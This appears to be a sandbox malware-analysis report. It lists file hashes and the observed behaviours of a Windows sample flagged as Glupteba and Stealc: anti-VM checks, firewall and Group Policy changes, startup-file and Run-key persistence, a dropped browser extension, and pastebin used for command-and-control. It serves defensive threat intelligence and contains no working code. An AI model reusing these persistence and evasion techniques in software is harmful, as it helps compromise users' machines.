| SHA256 | 0004703d28163c6eaf7b8d5fd7e1981a234e528a4d691df79819b76883f0f75a |
| SHA512 | 43c5d1a6acd675fae1f268146cd0c19712dd2661ebf78fa81c06cdfeac72d461d7d1b4d7eb613145d55fad1648945d1dd5fa5a1520a8b6c3687dabdd2c342a1b |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 2d2019a34d1bf37267d209a16145d96f |
| SHA1 | b6685e89f667a479b48eaf8418e6313124f0c328 |
| SHA256 | e16b1a0ce463db313e8bc9c7b0102aa33c15ba86226fb470b12db962f4cf6f25 |
| SHA512 | 5c4ba51f43cad2d6f0fdf93bd97156beeaa435e733b1d8f5b1e94c0603fecf278c3474a3ade03217b148bd7b293d8c7f3df38d0bd07c8022c8cf80c57b78ee3d |
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
C:\Users\Admin\Pictures\R84XgkwYCGHfoB3THGDD5mNW.exe
| MD5 | aaa56797070369ad346fbd9bb6cc5e8b |
| SHA1 | a1d01943f0a354d3a000628262671254ca6a91b8 |
| SHA256 | 9d7d08ac35f0113f7c814d257bf88b8222975aaa0a3fdeda88ac7185dbc50905 |
| SHA512 | e69d25a158567c6bce6e9450de17d0814b9b9c11f4bb31e5dcc3e8b4378062cc7e31da625f6ba4a2280b393034a6c832a0fc0a1e16364dc7e8c8146de245b5be |
memory/2604-673-0x0000000000400000-0x0000000001DFD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe
| MD5 | e77964e011d8880eae95422769249ca4 |
| SHA1 | 8e15d7c4b7812a1da6c91738c7178adf0ff3200f |
| SHA256 | f200984380d291051fc4b342641cd34e7560cadf4af41b2e02b8778f14418f50 |
| SHA512 | 8feb3dc4432ec0a87416cbc75110d59efaf6504b4de43090fc90286bd37f98fc0a5fb12878bb33ac2f6cd83252e8dfd67dd96871b4a224199c1f595d33d4cade |
memory/4860-676-0x0000000010000000-0x0000000013BC3000-memory.dmp
memory/3204-682-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/3204-712-0x0000000000400000-0x00000000008AD000-memory.dmp
C:\Windows\windefender.exe
| MD5 | 8e67f58837092385dcf01e8a2b4f5783 |
| SHA1 | 012c49cfd8c5d06795a6f67ea2baf2a082cf8625 |
| SHA256 | 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa |
| SHA512 | 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec |
memory/2604-739-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/2560-749-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2604-765-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/3512-766-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2604-774-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/5440-779-0x0000000010000000-0x0000000013BC3000-memory.dmp
C:\Windows\system32\GroupPolicy\Machine\Registry.pol
| MD5 | cdfd60e717a44c2349b553e011958b85 |
| SHA1 | 431136102a6fb52a00e416964d4c27089155f73b |
| SHA256 | 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f |
| SHA512 | dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8 |
memory/2604-801-0x0000000000400000-0x0000000001DFD000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | aa8dd57ca30513418d88cce7123f75a3 |
| SHA1 | 5c2f9b0ff200174b92816767b77b154713fb9f71 |
| SHA256 | 7f622bb24b1025d73781d0c35cbd3e3f88d78944cadd8240f45785e385253e2f |
| SHA512 | 25a9b324a6e65ca2e4e757d354f126e0b04b68bd75d541a014657cde98e49a925aa2d269ad21a5e10d6a8be75a83ef03c138c8e6d1ebfd6b25f41e0874b516ab |
C:\Windows\system32\GroupPolicy\gpt.ini
| MD5 | a62ce44a33f1c05fc2d340ea0ca118a4 |
| SHA1 | 1f03eb4716015528f3de7f7674532c1345b2717d |
| SHA256 | 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a |
| SHA512 | 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732 |
memory/2604-839-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/3512-840-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2604-846-0x0000000000400000-0x0000000001DFD000-memory.dmp
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
| MD5 | e30e3a5b5d1c4e01fc04a5f640489258 |
| SHA1 | d45f8ee1f500d3f525cc02fd991607187009ebd2 |
| SHA256 | 1e7bc119fa3771f6a792cb4cb6e1f9e11e946fbb1ddd70fc46e59bc0ee97b3f9 |
| SHA512 | 7d8eb050127c24247f84adda42c396cf317c3f973c692dfe32bdabeffd16c33f6ca67c653ffa1964d3b88306f8fe616c7a751b6d43018b8649c3d0cc05f9b27a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
| MD5 | 238d2612f510ea51d0d3eaa09e7136b1 |
| SHA1 | 0953540c6c2fd928dd03b38c43f6e8541e1a0328 |
| SHA256 | 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e |
| SHA512 | 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
| MD5 | 2a1e12a4811892d95962998e184399d8 |
| SHA1 | 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720 |
| SHA256 | 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb |
| SHA512 | bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
| MD5 | 0b1cf3deab325f8987f2ee31c6afc8ea |
| SHA1 | 6a51537cef82143d3d768759b21598542d683904 |
| SHA256 | 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf |
| SHA512 | 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
| MD5 | bd6b60b18aee6aaeb83b35c68fb48d88 |
| SHA1 | 9b977a5fbf606d1104894e025e51ac28b56137c3 |
| SHA256 | b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55 |
| SHA512 | 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ryfa7gh4.default-release\prefs.js
| MD5 | 5c02b5c4f94d718edcd4c0e6fd296aa6 |
| SHA1 | 8be9f3f2b7b9c91e7be2d918c3e90893aa7b7e2b |
| SHA256 | d9a5cde26a454372adc408ae242dd05110a90c3c48cf873169e524d905b66d06 |
| SHA512 | 96e5495f0519947ca35a91b5f36aec2583d4d333e0b8e75e4850ec160aabfeaf17a85f89c72e76ed956c8c16edfa79931411a92809bbb2e81c8b682f7c98af51 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 37578b05f30079dfab9402d840965c77 |
| SHA1 | c386b95d64a15f1f4a3c6906446556d303713940 |
| SHA256 | 8ed96ba8583756f2527ef70bff78cb9bf2afb7d7c1a5214e321feeef245522a7 |
| SHA512 | 5e4a05added9a614dcc0b89ecc96e0bdcb33ef8ab5a66a4a096eaf697efae201f22de9f6c5f65a2fe7239f995670ab5d7e00fd6556a48b7a2eb9f2d4e830f9cc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 7d47ee664a4e49a2e157c928bdceef3e |
| SHA1 | aca2efcbd04ab7cffd04e31228d3192692f7b82b |
| SHA256 | 7ccee053dc9cbc1b6537c0eba8f93e448566c6ba347fb8cb31e6a58a35aa3f4f |
| SHA512 | f56992cfcb5caf9567623b8451ebaeeaa2f0790ac1fe30f0b1509033ac934f72f7ebbc8e573e3bdce5e2d38ee99a8f89a6658cba7da5d6243aa9b0302476f31f |
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-19 14:04
Reported
2024-04-19 14:07
Platform
win11-20240412-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe | N/A |
Stealc
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vLxMkquwj2YLyeMbPWIrM04m.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Lma0w8jNTTBEKB4j2ImfhlKl.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BJcupLuUarzm5XXQzG6ujYry.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9XtibT4Yf4gH04TbrqAhIOG1.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e3y42iPJ08drhXOmj3ez4uBU.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BwNhJ3ZI8lFiFlan3IJP72hk.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iLLA17oZmuYEQ42ykMCFYANl.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4vHWCNg1n0gUuFSrnQ517HiF.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Pictures\m2oZU2kuNyXNzQIRlFQBnoBQ.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe | N/A |
